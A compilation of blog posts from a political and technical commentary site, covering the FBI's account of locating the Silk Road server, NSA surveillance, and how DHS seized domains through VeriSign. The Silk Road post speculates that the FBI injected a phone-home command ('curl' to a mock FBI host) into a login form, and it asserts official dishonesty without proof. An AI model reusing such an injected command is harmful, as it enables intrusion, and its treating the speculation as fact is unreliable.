The FBI Pwns You

A few hours ago Wired published details of the FBI’s rebuttal to the previously filed Ross Ulbricht defense motion that proffered the State’s case necessarily rested on evidence obtained from illegal searches(read: NSA dragnetting). The gist:

In the latest filing, however, former FBI agent Christopher Tarbell counters Ulbricht’s defense by describing just how he and another FBI agent located the Silk Road server in June of last year without any sophisticated intrusion: Instead, he says, they found a misconfiguration in an element of the Silk Road login page, which revealed its internet protocol (IP) address and thus its physical location.

As they typed “miscellaneous” strings of characters into the login page’s entry fields, Tarbell writes that they noticed an IP address associated with some data returned by the site didn’t match any known Tor “nodes,” the computers that bounce information through Tor’s anonymity network to obscure its true source. And when they entered that IP address directly into a browser, the Silk Road’s CAPTCHA prompt appeared, the garbled-letter image designed to prevent spam bots from entering the site.

The actual technical claim: Arbitrary HTTP Posts to the login form action leaked the Server’s Internet Protocol Address in the Response Headers and/or data payload.

Probability of said claim: Assuming Ulbricht(and the chain of ownership that preceded him) not to be idiots of the first order, ~0. The only likely “misconfiguration” would be the typical default configuration, which is to “leak” the web server and OS type/version in the response headers.

If we assume the FBI letter to be a half-truth, which frankly is not necessarily a reasonable presumption to make(as opposed to, say, the outright lie), we can ascertain a more accurate technical translation:

We sent a malicious string in the request body of a login submission to inject an executable code payload, $ curl http://laundry.forensics.fbi.gov, which essentially allowed to us to perform a remote drive-by phone home on the target.

Now, if we assume the half-truthiness of the FBI in this matter, we can thusly deduce a methodology of counter-attack by US intel organs against network obfuscation techniques–namely directly attacking the target at the application layer. In other words, the use of buffer overflow exploits(maybe zero-day or not) on the target itself to perform drive-by phone homes, or in a more sophisticated attack, to install a wiretap implementation.

Going forward, one has to assume that the use of “cyber-hacking” as means to facilitate a court-approved wiretap will be deemed legal in much the same way breaking into your property to install the old-fashioned wiretaps was deemed legally proper. Of course, I would be remiss not to point out that the legal sanctification of State hacking by organs of the justice department provides a very convenient laundromat for laundering the legality of any data collected by the 3-hop graphical dragnet(read: NSA).

Finally, it should be noted that it’s not surprising the State would eventually seize on this vector of attack. Since 1988(the infamous morris worm), it is been well-known that the weakness of the internet was not in the layered protocol design itself but in the client-server software implementation of the protocol standards. In particular, the c and c++ languages are susceptible to memory violations in string operations against arbitrary data length, resulting in access violations that can produce malicious results if the violating data is carefully formatted to do exactly that. In a sense, it is enough a problem that it could have killed the internet from the start if not for a sort of spontaneous, heuristic security best practices regime that arose that limited the problem of rogue actors to a tolerable one.

But if the heuristic law saved the internet, it is the “rule of law” that will surely kill it(in terms of being a utopian instrument). For it is the latter which turns software vulnerabilities into a primary means of both wiretapping targets and laundering graphical dragnets, reminding us, once again, that the State is indeed its own agency and its preservation best executed by a type of competitive agency of invasion of the body snatchers.

The State is its Own Agency

That the NSA has now commenced with overt pressure campaigns to countermand any legislative effort to curtail its vast surveillance enterprise cements an obvious liberal dilemma regarding the agency of the State. Make no mistake, totalitarian spying exemplifies an agency whose ends are in competition with the ends of its own citizens. This is a fatal violation of the liberal paradigm out in the open, staring you right in the face.

The germane question which moves to the fore of consideration hence pertains to the extent of government surveillance. Is it indeed totalitarian? If we were to constrain the scope of consideration strictly to the NSA itself, then the answer would probably be no. It’s modus operandi does not follow the traditional taxonomy of the textbook totalitarian spymaster. However, thanks to the documentation leaked by Edward Snowden, what we have now is confirmation of the cypherpunk dystopian model, which in a real sense, is much worse, for it portends a sustainable template of planetary social control. The NSA in and of itself is one thing. However, in the larger context of its coerced “strategic partnerships” with the top US internet & software companies–as means to facilitate/execute the data collection requirements–what we end up with is quite another: the equivalent of a libcap library on every one of your network devices persistently cataloging your “matrix” in the well-connected social graph, built and maintained under the “legal auspices” of a three-hop dragnet.

In light of the Snowden revelations, the NSA has embarked on the aforementioned pressure and information campaign to countermand the PR damage. Just yesterday, the NSA released two documents that purport to dispel the notion of it being an agency of totalitarian collection. Having just read them , I can say that the 1.6% statistic of “touched traffic” and 0.025% statistic of “reviewed traffic”, on a daily basis, are highly misleading. The first hoodwink is to point out that out of the exabyte daily traffic volume, roughly 60%-70% is ip video traffic1, which shrinks our “basketball court” down to the size of a racquetball court. The second hoodwink is to infer the sampling follows a pattern of independent random trials–in the classic stats model, proving or disproving a hypothesis drawn from such a random sample–instead of what it actually is: the accumulation of a graph-based document store enabling a traversable, retrospective query system. The whole thing is just plain subterfuge.

By now, it should be apparent that I consider the cypherpunks to be the most relevant social scientists of our day. In no small part because they are at the forefront of the battle-lines of 21st century political economy. Assange, for one, has been singularly confirmed on a number of points. In particular, the US reaction of “Insider Threat” has to count as spectacular confirmation of his thesis of “conspiracy and networks.” The kernel of differentiated political and economic jurisdiction that always lurked beneath the rationale of wikileaks now seems obvious in light of what is required for secure and autonomous cloud computing platforms going forward2. Assange’s contention that legal and regulatory entities were engaging in data-laundering–that is, ex post manufacturing legal reconstructions of “evidence” gathered from the NSA dragnet spying enterprise–has since been confirmed by Reuters with respect to two agencies: the DEA and the IRS.

In contrast, the “liberal” political and academic establishment are dinosaurs. No better example of this than this piece at “Bleeding Heart Libertarians,” The United States is not a Police State. The entire piece is a confirmation of my (quite prescient, as it turns out) old post, Free Market Fairness: A bridge to nowhere. Fernando Teson’s entire argument boils down to the position that truth should never stand in the way of mainstream recognition. Of course, as I pointed out in that earlier post, the “respectable libertarian formulation,” in the form of the chicago school, had held sway for thirty years in the domain of finance and “regulatory reform” leading to nothing but banking oligarchy and a permanent severance of political freedom from capitalism. As I pointed out at the end, all it would take would be a minority dissident faction to blow that entire thesis to smithereens and force the “bleeding hearts” to side with what everyone and their brother–outside of polite academic company–knew to be tyranny and oppression. I’m not surprised “Edward Snowden” doesn’t appear in any post on that site, outside one inclusion in an obscure link.

Frankly, the boogeyman of North Korea is tiresome as the singleton measuring stick of totalitarianism. For starters, the inquisitive person might ask just how long North Korea would last if not for China and the US directly and indirectly propping it up(which should trigger a deeper discussion of the taxonomy to begin with when considering States that prop up even worse monsters). However, the better question might be why the persistent singleton casting of 21st century totalitarianism in the mold of mid-20th century soviet model when that model–in terms of having any sphere of international influence–died out two decades ago?

In the recent book, “Cypherpunks: Freedom & The Future Of The Internet,” Andy Muller-Maguhn specifically outlines the stated intent of our 21st century spooks: the use of secrecy as a means to gain control of social processes. This presents a countervailing agency problem more along the lines of a “squishy totalitarianism,” but this is more than sufficient to eviscerate the liberal paradigm. In fact, it acquires a particular sinister aura because it appears quite apparent that most are quite comfortable persisting the liberal mythology within its confines. The industries of “social justice” and “the invisible hand of market social coordination” will continue to spit out oblivious drivel because after all, they are “industries.”

As I have noted on previous occasions, the planned order or surveillance introduces a potentially glaring incentive-incompatibility agency problem into market exchange. One that makes mincemeat of any position that uses the existence of markets as an immediate counterfactual to any claim of systems of social control. If we cast “spontaneous order” as a type of “social graph” and then analytically run it against the “planned order of surveillance” that exists to anatomize it, we obtain a “second-order dynamic” between the social graph and its surveillance that illuminates the distinction between laissez-faire and capitalism in a far greater clarity than the dinosaur methods of 20th century classical liberalism still mired in the roots of the socialist calculation debates.

Frankly, to avoid serious methodological error, one should start from the assumption of “the State as its own Agency.” Everything else flows from there…

1 As I pointed out in this old post, Technology is not Freedom, ip video has its own extensive surveillance regime.

2 Ideological preferences aside, the cloud, in any rent-seeking context, is where the internet goes because it is simply a much more efficient computing platform.

When Mickey Mouse and Barney Fife Join Forces

TechDirt has latest regarding the Mickey Mouse/Barney Fife operation that is behind the DHS seizure of domains.

I reviewed the “technical aspects” of the affidavit, at least the original partial one that can be found here ,and it pretty much confirms what I originally reported in this post, The Background Dope on DHS Recent Seizure of Domains. At the time of my original post on this subject, it was not verifiable whether these “seizures” were a part of an “official operation” or not, or if the instigators behind this were the usual suspects, MPAA,RIAA. When DHS announced this was part of an official operation, Operation In Our Sites 2, I wrote an update post here; and based on a subsequent LA Times article, I posted posted a comment here that reflected the fact that MPAA,RIAA were the ones who were reporting the “violating sites.”

Some notes on the affidavit:

It clearly specifies that the domain seizure was to be executed by going through VeriSign. I detailed the mechanics of how that was done in my original post. However, the affidavit also clearly specifies that the domains were to be transferred in ownership over to DHS/ICE vis a vis their respective registrars. That has not happened yet. That was supposed to be done, but Whois queries against the registrar databases for the domains in question indicate that it has not been done.

The affidavit gets the registrar, the IP Address and the hosting provider for torrent-finder.com wrong. It lists Blue Razor as the registrar, and even though Blue Razor appears to be owned by the same entity that own GoDaddy, it is GoDaddy who is the registrar. The hosting provider for torrent-finder.com is SoftLayer Technologies, located in Dallas, TX, and not Secure Hosting LTD, located in the Bahamas.

Reading the affidavit,particularly as it pertained to torrent-finder.com, I now know why ICE subcontracts out to “private companies” like immixGroup IT Solutions. We are literally dealing Agent Barney Fife, here. Writes Agent Fife:

“Based on my training and experience, queries of public movie listings and my discussion with MPAA representatives, I know that “Secretariat” is a first run movie that was released to the general public for homeviewing.”

Whoa, all that tax-payer funded training gave Agent Fife the requisite specialized knowledge to figure that all out by himself. I’m sure all that experience has trained him to first check with government computers to make sure that information wasn’t classified.

Agent Fife outlines how his specially trained snooping abilities led him to conclude that torrent-finder.com was actually hosting “pirated content.” The problem for Agent Fife, however, is that the “download link” that he clicked on that allowed him to directly download a torrent for “The Town” was actually being hosted by torecache.com in Estonia. We dread the day when agent Fife’s superior training and experience leads him to discover The Google can be used to pull up direct links to torrent files the MPAA disapproves of.

This exhibit A of Hayek’s “how the worst get to the top”….

Respectable Bomb Throwers

A former fellow contributor at Freedom Democrats has composed two recent posts, My respectability vs. their legitimacy and Are you on the inside or the outside?, that cautions against radical politics moving from an abstract layer of persuasive speech to one advocating criminal activity. The underlying factor here seems to be that WikiLeaks is raising the stakes, making the abstract suddenly tangible. An abstraction is now drawing some blood…it’s a threat. The cautionary thinking here is not to overplay the hand, not to resort to advocating the equivalent of anarchist bomb throwing, which could not only make one the target of the police(the police state) but which could also threaten to criminalize the abstraction itself, or at the very least, banish it from the topic of polite society.

Now I both agree and disagree with Ricketson. I agree that “anarchist bomb throwing,” whether it’s actually throwing bombs, or executing DDoS attacks against digital targets, is a loser strategy. You can try to cast these things into a type of “civil disobedience” rationale or justify them as defensive actions against Statist aggression, but the bottom line is that they are ineffective and counter-productive. And Ricketson’s point about the “mainstream’ should be taken to heart. The thing about “American radical libertarianism” that separates it from “anarchism” in general is that in America, radical libertarianism is more or less “liberal anarchism, ” and liberal anarchism has never sought to eradicate the “petty Bourgeoisie” as a precursor to some new social order. Indeed, Liberal anarchism embraces the “petty bourgeois” tradition and embraces it as a mainstream tradition. This to no end infuriates a larger segment of anarchist radicals who operate outside the “liberal anarchist tradition.”

Where I disagree with Ricketson perhaps starts with this quote by Janet Napolitano:

“The old view that ‘if we fight the terrorists abroad, we won’t have to fight them here’ is just that – the old view,” Homeland Security Secretary Janet Napolitano told police and firefighters recently.

Ricketson takes his alias from Benjamin Tucker and those who are familiar with libertarian history know that Tucker, after he left the United States and emigrated to France, actually supported World War I on the basis that the German glorification of military culture was such a threat to the “petty bourgeois” liberal tradition that it had to be opposed, even by force. Here I am reminded of the old Barry Goldwater joke, “vote for Goldwater and we will end up in Vietnam.” Well, a wag or two have been known to crack back in the day, “we voted for Goldwater and sure enough, we ended up in Vietnam.” To Tucker’s Ghost I would crack, the United States went to war and yet we ended up with the very thing you dreaded.

As Orwell brilliantly elucidated, permanent war is the permanent war of the ruling class against it’s own citizens. It is a destroyer of liberalism. It is the National Security State, not anarchism, which is the threat to the mainstream of a “petty bourgeois” polite society. The horror is to contemplate just exactly what is to become of this “mainstream” under a censorship regime, when uncensored abstraction itself, by definition, is a threat.

In a permanent War on Terror, terrorism is not bomb throwing, rather it is any ideological challenge to the “Status Quo.” When Janet Napolitano states that the guns have turned inward, she doesn’t mean they are pointing at some random asymmetric violent threat, rather she means they are pointing at any systemic abstract threat to the Status Quo. They are aimed at any “institutional alternatives” to the status quo. If these “institutional alternatives” draw any blood, that is, threaten the Status Quo, those guns will fire…and it would be impolite in polite society not to pretend otherwise.

Respectability=see no evil, hear no evil, speak no evil…

The Background Dope on DHS Recent Seizure of Domains

As has been reported, it looks like ICE, which is the principal investigative arm of DHS, has begun seizing domains under the pretext of IP infringement. But it’s actually not ICE who is executing the mechanics of the seizures. It’s a private company, immixGroup IT Solutions. Here is what is going down.

In May of this year, immixGroup IT Solutions is awarded a one year IT Services contract with DHS. The particulars of this contract:

Under this new contract, immixGroup will provide information technology operational services and support, implementation, and maintenance of DHS ICE C3’s software applications, network and CyberSecurity systems, as well as the maintenance and enhancement of applications that support law enforcement activities.

The contract includes one base year, one 12-month option period, and two six-month option periods; covers all four divisions of C3 (Child Exploitation, Cyber Crimes, Computer Forensics, and Cyber Training); and is critical to C3’s pursuit of criminal activity. immixGroup’s services in this effort include network maintenance, application development and support, forensic lab assistance, data storage maintenance, and information assurance.

On November 24th, immixGroup IT Solutions registered the domain SEIZEDSERVERS.COM, and primary and secondary nameservers, NS1.SEIZEDSERVERS.COM, NS2.SEIZEDSERVERS.COM, with Network Solutions, which is the registrar for this domain. Since the DHS contract is provisionally for one year only, the domain was only registered for one year(expires in one year).

immixGroup IT Solutions is using CaroNet to host their domain, including the authoritative name servers(NS1.SEIZEDSERVERS.COM, NS2.SEIZEDSERVERS.COM) for this domain. They have setup a simple web page, http://seizedservers.com/ or http://74.81.170.110 which is the same “Notification of Seizure” page you will get if you type in one of the seized domains in browser address bar(if you’re paranoid: yes, they are tracking using both Google analytics and piwik).

ICE is not actually “seizing” any servers or forcing hosting companies to remove web content from their servers; what they are doing is using immixGroup IT Solutions to switch the authoritative name servers for these “seized domains.” But they are not doing it at the Registrar level(by contacting the registrar for the domain and forcing them to update the authoritative name server info to point to NS1.SEIZEDSERVERS.COM, NS2.SEIZEDSERVERS.COM), but rather through the agency who controls the top level domain. In this case, all the “seized domains” appear to be .com and the agency/company who has the ICANN contract for this TLD is VeriSign(which also controls .net TLD). The changes are being made at the top-level authoritative name servers for the .com TLD, which would be the [a-m].gtld-servers.net. These are controlled by VeriSign(note: these top-level name servers are also authoritative for .net and .edu TLDs).

So, VeriSign, the owner of the .com TLD, is working in cooperation with DHS, and it appears immixGroup IT Solutions has what we might call an “IT Support Ticket system” setup with VeriSign.

That web servers are not being seized and web content not being deleted can easily be verified by clicking this link, http://208.101.51.57, which is the original IP Address of a seized domain, torrent-finder.com. It’s still up, and it appears it has registered a new domain, torrent-finder.info, that resolves to the original IP address. This site is being hosted by SoftLayer Technologies in Dallas, TX. So, it is certainly within US jurisdiction to be shut down if there was “a case to be made.”

Now the .info TLD is not controlled by VeriSign; it’s controlled by Afilias. So, an interesting little experiment would be to see if the torrent-finder.info domain remains up. As of now, we can only conclude that there is back deal between DHS and VeriSign that makes any .com or .net domain subject to seizure by the actions of immixGroup IT Solutions.

Lastly, there has been some speculation that this recent business of “domain seizure” portends the same tactics being used to seize the “wikileaks.org” domain. From a technical standpoint, understand that the .org TLD is not controlled by VeriSign; it is controlled by the Public Interest Registry. An interesting thing however: PIR has contracted out the technical operations to Afilias. So, if we were to see torrent-finder.info similarly seized, then this would mean that Afilias is also in cahoots with DHS, which could imply the .org TLD could be subject to the same type of “domain seizures.” As of now, there is no evidence of that. And, it should be clear, these type of domain seizures are completely different than the 2008 attempted shutdown of wikileaks.org by the US government. In that case, a U.S. District Court issued an injunction ordering Dynadot, which was the registrar for the domain, to remove all traces of Wikileaks from its records. That didn’t hold up.